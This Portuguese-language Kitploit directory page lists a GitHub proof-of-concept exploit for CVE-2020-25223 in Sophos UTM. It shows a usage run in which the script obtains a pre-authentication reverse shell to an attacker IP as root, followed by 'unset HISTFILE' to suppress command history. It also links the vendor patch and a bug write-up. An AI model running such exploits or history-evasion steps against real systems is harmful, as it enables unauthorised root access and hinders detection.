Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/darrenmartyn/sophucked
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingFerramenta de Acesso Remoto
GitHubdarrenmartyn/sophucked

sophucked

CVE-2020-25223

Ver Repositório
111há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

sophucked

PoC de RCE para CVE-2020-25223, obtém reverse shell. Pré-autenticação. Implementei isto rapidamente porque era necessário unificar alguns threat magnets.

Exemplo de uso:

root@kitploit:~
# python sophucked.py https://x.x.x.x:4443 x.x.x.x 80
(+) starting handler on port 80
(+) Sending callback to x.x.x.x:80
(+) connection from x.x.x.x
(+) pop thy shell!
bash: no job control in this shell
utm:/var/confd # unset HISTFILE
unset HISTFILE
utm:/var/confd # id
id
uid=0(root) gid=0(root) groups=0(root)
utm:/var/confd # exit
exit
exit
*** Connection closed by remote host ***
# 

Escaneamento/Detecção

Não implementado aqui, basta usar o template do nuclei.

Notas de pós-exploração

Eles têm um interpretador Python e, na verdade, um ambiente Linux muito completo disponível. Potencial incrível para pós-exploração.

Notas para o blue team

Tenho certeza de que alguém que se importa pode preencher isso. Bitter (um subgrupo do "blue team twitter") provavelmente fará isso em breve. Quer dizer, não deve ser tão difícil detectar um reverse shell não criptografado dando beacon a partir do seu equipamento Unified Threat Manager, certo?

Corrigindo o bug

Alguém (presumivelmente da Sophos) enviou isto, é o link oficial da correção. Vá atualizar seu UTM. https://www.sophos.com/en-us/security-advisories/sophos-sa-20200918-sg-webadmin-rce

Referências, etc.

Referência de terceiros (detalhes do bug): https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223

Reclamações diretas para a Sophos, que de alguma forma achou que passar entrada do usuário para open() em Perl era uma boa ideia no século XXI.

Baixar ferramenta